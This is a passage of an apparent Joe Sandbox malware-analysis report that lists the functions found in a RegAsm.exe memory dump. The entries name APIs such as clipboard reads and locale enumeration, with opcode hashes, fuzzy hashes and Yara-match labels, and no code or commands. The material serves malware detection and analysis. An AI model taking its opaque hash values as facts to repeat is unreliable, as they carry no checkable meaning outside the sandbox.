                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                  • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                  • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                  • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 0040B711
                                  • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                  • CloseClipboard.USER32 ref: 0040B725
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseDataOpen
                                  • String ID:
                                  • API String ID: 2058664381-0
                                  • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                  • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                  • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                  • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                  • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                  • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                  • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID: lJD
                                  • API String ID: 1084509184-3316369744
                                  • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                  • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                  • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                  • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID: lJD
                                  • API String ID: 1084509184-3316369744
                                  • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                  • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                  • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                  • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: GetLocaleInfoEx
                                  • API String ID: 2299586839-2904428671
                                  • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                  • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                  • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                  • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                  • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                  • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                  • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                  • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                  • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                  • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00453326,?,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                  • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                  • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                  • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                  • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                  • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                  • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                  • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                  • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                  • String ID:
                                  • API String ID: 1663032902-0
                                  • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                  • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                  • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                  • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale_abort_free
                                  • String ID:
                                  • API String ID: 2692324296-0
                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                  • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                  • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                  APIs
                                    • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                  • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                  • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                  • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                  • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID:
                                  • API String ID: 1084509184-0
                                  • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                  • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                  • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                  • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                  • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                  • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                  • Instruction Fuzzy Hash:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                  • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                  • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                  • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                                  • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                  • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                  • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                                  • Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                  • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                  • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                                  • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                  • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                  • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                  • Opcode Fuzzy Hash: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                  • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                  • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                  • Opcode Fuzzy Hash: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                  • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                  • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                  • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                  • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                  • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                  • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                  • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                  • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                  • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                  • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                  • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
                                  • Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                  • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                  • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                                  • Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                  • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                  • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
